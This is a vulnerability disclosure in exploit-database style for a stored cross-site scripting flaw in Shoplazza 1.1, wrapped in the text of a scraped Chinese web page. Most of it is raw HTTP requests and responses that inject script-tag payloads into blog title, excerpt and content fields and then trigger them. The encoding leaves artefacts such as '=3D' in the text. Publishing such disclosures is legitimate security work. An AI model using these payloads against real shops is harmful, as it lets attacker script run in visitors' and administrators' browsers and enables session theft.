扫码分享
验证:
体验盒子# Exploit Title: Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Andrey Stoykov
# Software Link: https://github.com/Shoplazza/LifeStyle
# Version: 1.1
# Tested on: Ubuntu 20.04
Stored XSS #1:
To reproduce do the following:
1. Login as normal user account
2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post"
3. Select "Title" and enter payload "><script>alert(1)</script>
// HTTP POST request showing XSS payload
PATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1=
.1
Host: test1205.myshoplaza.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
101 Firefox/100.0
[...]
{"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><s=
cript>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","c=
ontent":"<p>\"><script>alert(3)</script></p>"[...]
// HTTP response showing unsanitized XSS payload
HTTP/1.1 200 OK
Content-Type: application/json; charset=3Dutf-8
[...]
{"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\=
"><script>alert(2)</script>","published":true,"seo_title":"Title\"><script>=
alert(1)</script>"[...]
// HTTP GET request to trigger XSS payload
GET /blog/titlescriptalert1script?st=3DeyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9=
.eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC=
03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUK=
Enfj9L49I HTTP/1.1
Host: test1205.myshoplaza.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
101 Firefox/100.0
[...]
// HTTP response showing unsanitized XSS payload
HTTP/1.1 200 OK
Content-Type: text/html; charset=3DUTF-8
[...]
<meta name=3D"viewport" content=3D"width=3Ddevice-width,initial-scale=3D1,m=
inimum-scale=3D1,maximum-scale=3D1,user-scalable=3Dno,viewport-fit=3Dcover"=
>
<title>Title"><script>alert(1)</script></title>
<meta name=3D"keywords" content=3D"test1205">
[...]
--rehcsed-054bdeb7-e1dc-47b8-a8d3-67ca7da532d2--
体验盒子
